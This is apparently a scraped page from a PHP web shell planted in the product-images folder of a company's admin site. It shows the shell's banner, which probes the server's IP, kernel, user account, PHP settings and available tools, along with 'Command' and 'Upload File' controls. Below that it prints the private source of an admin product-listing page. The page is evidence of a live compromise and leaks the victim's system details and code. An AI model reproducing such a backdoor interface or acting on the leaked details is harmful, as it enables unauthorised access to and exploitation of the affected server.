Server IP : 103.83.81.220 / Your IP : 3.138.175.166 Web Server : Apache System : Linux vps.erainfotech.co 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64 User : nirkonhealthcare ( 1248) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/nirkonhealthcare:/var/log/spamavoid/:/tmp/:/var/lib/php/session/) in /home/nirkonhealthcare/public_html/admin/productimages/anopas.php on line 323 OFF | Perl : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/nirkonhealthcare:/var/log/spamavoid/:/tmp/:/var/lib/php/session/) in /home/nirkonhealthcare/public_html/admin/productimages/anopas.php on line 329 OFF | Python : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/nirkonhealthcare:/var/log/spamavoid/:/tmp/:/var/lib/php/session/) in /home/nirkonhealthcare/public_html/admin/productimages/anopas.php on line 335 OFF Directory (0755) : /home/nirkonhealthcare/public_html/admin/css/../css/../css/../ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include "conn.php"; session_start(); if (empty($_SESSION["admin"])) { header('location:index.php'); } else { ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <meta name="description" content="Praneja Envirocare & Management Pvt. Ltd." /> <meta name="author" content="Praneja Envirocare & Management Pvt. Ltd." /> <title>All Products </title> <link rel="icon" type="image/png" href="img/favicon.png"> <link href="vendor/icons/feather.css" rel="stylesheet" type="text/css"> <link href="vendor/fontawesome/css/fontawesome.min.css" rel="stylesheet" type="text/css"> <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet"> <link href="css/styles.css" rel="stylesheet" /> <link href=" https://cdn.datatables.net/1.11.3/css/jquery.dataTables.min.css" rel="stylesheet"> <link href=" https://cdn.datatables.net/buttons/2.0.1/css/buttons.dataTables.min.css" rel="stylesheet"> </head> <body class="sb-nav-fixed"> <!-- start Header --> <?php include "header/header.php"; ?> <!-- End Header --> <div id="layoutSidenav"> <!-- Start Sidebar --> <?php include "header/sidebar.php"; ?> <!-- End Sidebar--> <div id="layoutSidenav_content"> <main> <div class="container-fluid mt-5"> <div class="row"> <div class="col-xl-12"> <div class="card mb-4"> <div class="card-header"> <i class="fas fa-box mr-1"></i> <b> All Products </b> <button type="button" class="btn btn-primary" style='float:right;'><?php $url = htmlspecialchars($_SERVER['HTTP_REFERER']); echo "<a href='$url' class='text-white'>Back</a>"; ?></button> </div> <div class="card-body"> <div class="table-responsive"> <table class="table table-bordered display nowrap" id="example" width="100%" cellspacing="0"> <thead class="table-dark"> <tr class="text-uppercase"> <th>S. no</th> <th>Product Name</th> <th>Product Type</th> <th>Add Date</th> <th>Status</th> <th>Action</th> </tr> </thead> <tbody> <?php $i = '1'; $query = "SELECT * FROM products ORDER BY product_id desc"; $result = mysqli_query($connect, $query); while ($row = mysqli_fetch_assoc($result)) { ?> <tr> <td><?php echo $i++; ?></td> <td> <b><a href="product_full_detail.php?id=<?php echo $row['product_id']; ?>"> <?php echo $row['product_name']; ?> </a></b> </td> <td><?php echo $row['product_type']; ?> </td> <td> <?php echo $row['product_add_date']; ?></td> <td class="font-weight-bold"><button type="button" class="btn btn-success btn-sm"> <?php echo $row['product_status']; ?> </button> </td> <td> <a href="product_full_detail.php?id=<?php echo $row['product_id']; ?>" class="btn btn-primary btn-sm "><i class="fas fa-expand-arrows-alt"></i> View </a> <a href="update_product.php?id=<?php echo $row['product_id']; ?>" class="btn btn-sm btn-info"><i class="fas fa-pen"></i></a> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> </div> </main> <?php include "header/footer.php"; ?> </div> </div> <script src="vendor/jquery/jquery.min.js"></script> <script src="vendor/fontawesome/js/all.min.js"></script> <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script> <script src="js/scripts.js"></script> <script src="js/rocket-loader.min.js"></script> <script src="https://cdn.datatables.net/1.11.3/js/jquery.dataTables.min.js"></script> <script src="https://cdn.datatables.net/buttons/2.0.1/js/dataTables.buttons.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jszip/3.1.3/jszip.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/pdfmake/0.1.53/pdfmake.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/pdfmake/0.1.53/vfs_fonts.js"></script> <script src="https://cdn.datatables.net/buttons/2.0.1/js/buttons.html5.min.js"></script> <script src="https://cdn.datatables.net/buttons/2.0.1/js/buttons.print.min.js"></script> <script> $(document).ready(function() { $('#example').DataTable({ dom: 'Bfrtip', buttons: [ 'copy', 'csv', 'excel', 'pdf', 'print' ] }); }); </script> </body> </html> <?php } ?>